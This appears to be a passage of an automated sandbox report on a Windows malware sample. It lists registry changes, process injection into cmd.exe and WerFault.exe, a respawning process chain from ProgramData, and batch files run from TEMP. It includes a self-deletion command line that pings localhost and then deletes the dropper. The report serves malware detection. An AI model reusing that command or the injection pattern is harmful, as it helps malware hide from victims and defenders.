Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D25A5B7E-7C27-41B6-85A7-D7DFDF730D14}\WpadDecisionReason = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Microsoft\National\Nationa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c @ping -n 5 127.0.0.1&del C:\Users\Admin\AppData\Local\Temp\564651~1.EXE > nul

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 380

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\069f635f.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\2a5e5aa5.bat" "

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\49f92fd0.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\3b645e2c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1cc7346a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\26491afc.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\59b8415e.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\21372fea.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\30b94a85.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 276 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\50453d3e.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\55c033c4.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6f4b7274.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7ece0d0f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\605d77ce.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\69df5e60.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\516f7d28.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\22f60fc9.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0e8d1e9d.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\5c0c4132.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7f9f23f7.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\612e0eb6.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4cc51d8a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7a602464.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6bf76741.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0f8a4a06.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\432604e9.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\24b56fa8.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\524f7682.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6bda3532.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\19753c0c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\39012ec5.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\24983d99.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4e2b5467.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\3dc95347.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\5d554600.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0af04cda.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6c7f3799.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

